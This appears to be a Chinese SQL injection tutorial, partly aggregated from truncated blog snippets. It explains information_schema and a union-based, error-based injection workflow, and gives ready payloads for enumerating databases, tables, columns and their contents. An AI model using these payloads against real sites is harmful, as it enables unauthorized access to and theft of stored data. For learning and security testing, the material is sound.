庫:就是一堆表組成的資料集合
資料庫裡自帶的系統庫:information_schema
information_schema裡columns表裡存著所有欄位名
information_schema裡schemata表裡存著所有庫名
information_schema裡tables表裡存著所有表名
常用的sql語句:
select * from :從表裡查詢所有內容
where :有條件的從表裡選取資料
and或or:按條件選取資料
order by :根據指定結果選取排序
limit0,1:從第一行起顯示1條記錄
union select :將多個表拼在一起
顯錯注入-聯合查詢(mysql)基本流程:
是否存在注入點—>猜解字段數—>聯合查詢尋找輸入點->利用系統自帶庫查詢欄位名和表名->獲取我們需要的資料或許可權
猜測資料庫版本:and 1=2 union select 1,version()
猜詢資料庫:and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
查詢表名 :and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1
查詢欄位名:and 1=2 union select 1,group_concat(column_name) from information_schema.cloumns where table_schema=database() and table_name =『表名』
查詢字段內容:and 1=2 union select 1,字段 from 表名
MySQL顯錯注入
updatexml xml target,xpath expr,new xml 該函式將xml標記xml target的給定片段的單個部分替換為新的xml片段new xml,然後返回更改後的xml。被替換的xml target部分與使用者提供的xpath表示式xpath expr匹配。說白了,就是用...
mysql錯誤回顯注入 sql注入 顯錯注入
前提知識 資料庫 就是將大量資料把儲存起來,通過計算機加工而成的可以高效訪問資料庫的資料集合 資料庫結構 庫 就是一堆表組成的資料集合 表 類似 excel,由行和列組成的二維表 字段 表中的列稱為字段 記錄 表中的行稱為記錄 單元格 行和列相交的地方稱為單元格 在資料庫裡有乙個系統庫 inform...
SQL注入 顯錯注入
顯錯注入 步驟1 判斷是否存在注入點 步驟2 猜解字段數 步驟3 聯合查詢找出輸出點 步驟4 去系統自帶庫查詢表名和欄位名 步驟5 查詢我們需要的欄位名 步驟1 判斷是否存在注入點 192.168.1.10 1 id 1 這裡可以用id 1 來確定是否存在注入點,192.168.1.10 1 id ...